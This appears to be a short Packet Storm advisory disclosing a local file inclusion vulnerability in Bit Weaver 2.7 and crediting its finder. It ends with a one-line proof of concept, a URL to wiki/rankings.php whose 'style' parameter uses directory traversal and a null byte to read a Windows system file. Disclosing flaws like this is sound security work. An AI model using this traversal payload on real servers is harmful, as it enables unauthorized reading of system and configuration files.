Bit Weaver version 2.7 suffers from a local file inclusion vulnerability.
2dd56da18b0073f71bacd2e8b8df2fe655be67940285caaaf4357ed63b9b6e08------------------------------------------------------------------------
Software................Bit Weaver 2.7
Vulnerability...........Local File Inclusion
Download................http://www.bitweaver.org/
Release Date............7/1/2010
Tested On...............Windows Vista + XAMPP
------------------------------------------------------------------------
Author..................John Leitch
Site....................http://cross-site-scripting.blogspot.com/
Email...................john.leitch5@gmail.com
------------------------------------------------------------------------
--Description--
A local file inclusion vulnerability in Bit Weaver 2.7 can be
exploited to include arbitrary files.
--PoC--
http://localhost//bitweaver/wiki/rankings.php?style=../../../../../../../../windows/system.ini%00
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed